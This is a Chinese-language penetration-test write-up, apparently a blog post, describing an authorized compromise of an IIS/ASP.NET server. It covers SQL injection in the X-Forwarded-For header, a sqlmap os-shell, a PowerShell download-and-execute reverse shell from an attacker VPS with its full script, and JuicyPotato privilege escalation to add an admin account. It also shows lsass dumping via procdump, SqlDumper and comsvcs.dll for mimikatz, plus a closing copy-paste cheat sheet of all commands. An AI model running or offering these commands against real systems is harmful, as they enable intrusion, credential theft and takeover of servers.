項目實戰(zhàn) | 細節(jié)決定成敗的滲透測試

0x00 前言

個人水平有限，文章若有不足之處，感謝各位大佬批評指正，希望能夠與各位師傅分享學(xué)習(xí)。

目標(biāo)地址：http://www.xxx.com

找到ip地址，進行訪問，發(fā)現(xiàn)ip為：x.x.x.x

使用ip地址進行訪問

0x01 信息收集

指紋識別結(jié)果：IIS10.0，asp.net ，Windows Server

爬取了一下網(wǎng)站，發(fā)現(xiàn)fackeditor，和很多接口

利用御劍目錄掃描，掃出來一些fackeditor的連接和upload目錄

0x02 測試階段

嘗試利用fackeditor的兩處上傳點進行上傳，但是由于一直卡住傳不上去和上傳校驗遂放棄了

對主站抓包測試發(fā)現(xiàn)，網(wǎng)站返回訪問者IP地址，依據(jù)經(jīng)驗這里經(jīng)常存在XFF注入

截取數(shù)據(jù)包修改X-Forwarded-For：1.1.1.1

發(fā)現(xiàn)當(dāng)前ip并未變化說明此處不存在XSS

習(xí)慣性的試了個單引號，數(shù)據(jù)庫報錯了，可能存在sql注入，并且泄露了絕對路徑。

構(gòu)造sqlserver注入語句：

' and 1=db_name()-- 返回數(shù)據(jù)庫

' and 1=@@version-- 返回數(shù)據(jù)庫版本

0x03 漏洞利用

既然手工這樣都可以注入出來，那嘗試一下使用sqlmap。

X-Forwarded-For存在報錯，堆疊以及延時注入

--dbs 獲取所有數(shù)據(jù)庫

嘗試--os-shell,發(fā)現(xiàn)可以得到os-shell

嘗試執(zhí)行whomai，mssqlserver權(quán)限

當(dāng)前權(quán)限不夠，我們可以利用powershell來反彈shell，然后下載提權(quán)exp進行提權(quán)，然后添加用戶來登陸目標(biāo)服務(wù)器。

首先在vps利用python生成一個web

python3 -m http.server 8000

http://www.vps.com:8000/1.ps1

ps1文件可以訪問

1.ps1的內(nèi)容里填入需要利用powershell反彈的vps和端口

vps監(jiān)聽9999端口，在os-shell中執(zhí)行以下命令

powershell?IEX?(New-Object?Net.WebClient).DownloadString('http://www.vps.com:8000/1.ps1');Invoke-lltestTcp

shell彈回來了

查看版本，版本是2016，64位。

現(xiàn)在嘗試提權(quán)，利用爛土豆直接提，windows下載文件的方式有很多，這里選擇powershell的下載方式：

將爛土豆放在vps的web目錄

在彈回來的powershell中習(xí)慣性進入c:\windows\tasks目錄，dir發(fā)現(xiàn)無文件，然后輸入

$ client=new-object?System.Net.WebClient

再輸入：

$client.DownloadFile('http://www.vps.com:8000/p1.exe','c:\windows\tasks\p1.exe')

成功下載提權(quán)exp到目錄，利用exp提權(quán)到system權(quán)限

接下來新建用戶，添加到管理員組

./p1.exe?-p?"net?user?admin?password?/add"./p1.exe?-p?"net?localgroup?administrators?admin?/add"./p1.exe -p "net user admin"發(fā)現(xiàn)用戶添加到管理員組成功。

接下來找rdp端口，判斷是否開放或者對外開放。

tasklist /svc |findstr "Ter"

查找TermService對應(yīng)的pid

通過pid來查找rdp端口，端口為11520

netstat -ano | findstr "1628"

通過nmap掃描IP地址發(fā)現(xiàn)11520端口對外開放，都不用做流量代理了，很舒服。

現(xiàn)在我們通過新建在管理員組的用戶登陸進去

桌面上東西有點少，在這臺電腦里面翻東西有點廢時間，于是傳了個everything上去

因為不是administrator，彈出來了uac，強迫癥的我還是想dump出這個管理員的密碼。

因為現(xiàn)在已經(jīng)進了3389了，就直接在目標(biāo)服務(wù)器上傳mimikatz，省的去webshell里面執(zhí)行了。

傳上去一運行就被殺了，土豆沒殺卻殺了mimiakatz，利用過了360和火絨的免殺mimikatz依然被殺。

對比tasklist /svc發(fā)現(xiàn)是微軟自帶的Microsoft Security Essentials

看來直接運行mimikatz是不行了，那就嘗試導(dǎo)出lsass.dmp吧，導(dǎo)出lsass.dmp有很多種方法，免殺的有sqldumper和procdump，還可以利用powershell。

這里利用procdump導(dǎo)出了

procdump64.exe -accepteula -ma lsass.exe c:\lsass.dmp

但是很神奇，過了一會當(dāng)我準(zhǔn)備拷貝lsass.dmp到本地的時候發(fā)現(xiàn)，lsass.dmp居然沒了，納尼？

不過不礙事，只要我手速夠快，就沒有問題，納尼？手速夠快，拷貝速度不夠啊，還沒拷過來一丟丟呢，就直接出現(xiàn)了錯誤，果然lsass.dmp果然又沒了。

那怎么辦，dump到其他盤符試試，還是沒了

那咱們利用sqldumper

通過everything搜索sqldumper，sqldumper的常見路徑如下：

C:\Program?Files\Microsoft?SQL?Server\100\Shared\SqlDumper.exeC:\Program?Files\Microsoft?Analysis?Services\AS?OLEDB\10\SQLDumper.exeC:\Program?Files?(x86)\Microsoft?SQL?Server\100\Shared\SqlDumper.exe

發(fā)現(xiàn)這個機器的sqldumper的路徑和平時遇見的不太一致，先試試吧

利用lsass.exe發(fā)現(xiàn)PID

"C:\Program?Files?(x86)\Microsoft?SQL?Server\130\Shared\SqlDumper.exe"?1316?0?0x01100

dump失敗

換一個路徑，dump下來了SQLDmpr0001.mdmp

"C:\Program?Files\Microsoft?SQL?Server\130\Shared\SqlDumper.exe"?1316?0?0x01100

復(fù)制到本地，管理員打開mimikatz，運行以下語句，報錯了，有點小難受，具體原因還不清楚，知道的師傅還請指點。

sekurlsa::minidump?SQLDmpr0001.mdmp"sekurlsa::logonPasswords full

利用sqldumper失敗了，那最后試試powershell吧，這個還是之前同事告訴我的，感謝同事

powershell?-c?"rundll32?C:\windows\system32\comsvcs.dll,?MiniDump?1316?C:\lsass.dmp?full"

成功dump，

刷新了半天發(fā)現(xiàn)lsass.dmp還在，趕緊拷貝到本地利用mimikatz解密，ok感謝電腦，拷貝過來了

mimikatz解密一下

sekurlsa::minidump?lsass.dmpsekurlsa::logonPasswords full

Password那里是空的，在win10或者2012R2以上，默認在緩存中禁止保存明文密碼，可以修改注冊表并且管理員需要重新登陸才能成功抓取明文，不過可以解密一下NTLM

nice，果然是收費的，

找有錢的公司小姐姐花了一塊錢成功解密，感謝公司小姐姐，如果每一個做安全的都像我一樣摳門，這些網(wǎng)站估計要倒閉吧

我們利用administrator登陸一下

舒服了，桌面上多了很多東西，慢慢翻吧，

打開sqlserver management，windows身份認證直接登陸上去：

賬號密碼郵箱手機號找到了

利用里面的賬號密碼發(fā)現(xiàn)都能登錄，登陸一下管理員用戶看看

不過這個站沒有內(nèi)網(wǎng)，后來也就沒有進行下去了。

后續(xù)在服務(wù)器繼續(xù)翻點配置文件的操作，用來寫報告的就不多贅述了。因為是授權(quán)的，痕跡也不用清了，接下來就是交報告了。

最后整理一下用到的命令吧，希望對喜歡ctrl+v的師傅們有些許幫助，祝各位師傅們身體健康，挖洞每天都是高危+嚴重。

sql注入測試：

' and 1=db_name()--

' and 1=@@version--

python開啟web ：

python3 -m http.server 8000

powershell反彈shell：

powershell?IEX?(New-Object?Net.WebClient).DownloadString('http://www.vps.com:8000/1.ps1');Invoke-lltestTcp

1.ps1文件內(nèi)容：

function Invoke-lltestTcp{
$client?=?New-Object?Net.Sockets.TCPClient('vps',port)$stream?=?$client.GetStream();[byte[]]$bytes?=?0..65535|%{0}while(($i?=?$stream.Read($bytes,?0,?$bytes.Length))?-ne?0){$data?=?(New-Object?-TypeName?System.Text.ASCIIEncoding).GetString($bytes,0,?$i)$sendback?=?(iex?$data?2>&1?|?Out-String?)$sendback2?=?$sendback?+?'PS?'?+?(pwd).Path?+?'>?'$sendbyte?=?([text.encoding]::ASCII).GetBytes($sendback2)$stream.Write($sendbyte,0,$sendbyte.Length)$stream.Flush()}$client.Close()}

powershell下載文件：

$client=new-object?System.Net.WebClient$client.DownloadFile('http://www.vps.com:8000/p1.exe',?'c:\windows\tasks\p1.exe')

查看操作系統(tǒng)版本：

wmic OS get Caption,CSDVersion,OSArchitecture,Version

爛土豆提權(quán)添加用戶：

./JuicyPotato.exe?-p?"whoami"./JuicyPotato.exe?-p?"net?user?admin?password?/add"./JuicyPotato.exe?-p?"net?localgroup?administrators?admin?/add"

查找rdp端口和進程查看：

tasklist?/svc?|findstr?"Ter"netstat?-ano?|?findstr?"PID"tasklist /svc

procdump64導(dǎo)出lsass.dmp:

procdump64.exe -accepteula -ma lsass.exe c:\lsass.dmp

SqlDumper.exe導(dǎo)出SQLDmpr0001.mdmp：

tasklist?/svc?|findstr?lsass.exe?//查看lsass.exe的pid"C:\Program?Files\Microsoft?SQL?Server\100\Shared\SqlDumper.exe"?pid?0?0x01100

mimikatz解密SQLDmpr0001.mdmp：

sekurlsa::minidump?SQLDmpr0001.mdmpsekurlsa::logonPasswords full

powershell導(dǎo)出lsass.dmp：

powershell?-c?"rundll32?C:\windows\system32\comsvcs.dll,?MiniDump?1316?C:\lsass.dmp?full"

mimikatz解密lsass.dmp：

sekurlsa::minidump?lsass.dmpsekurlsa::logonPasswords full

?

END.

歡迎轉(zhuǎn)發(fā)~

歡迎關(guān)注~

歡迎點贊~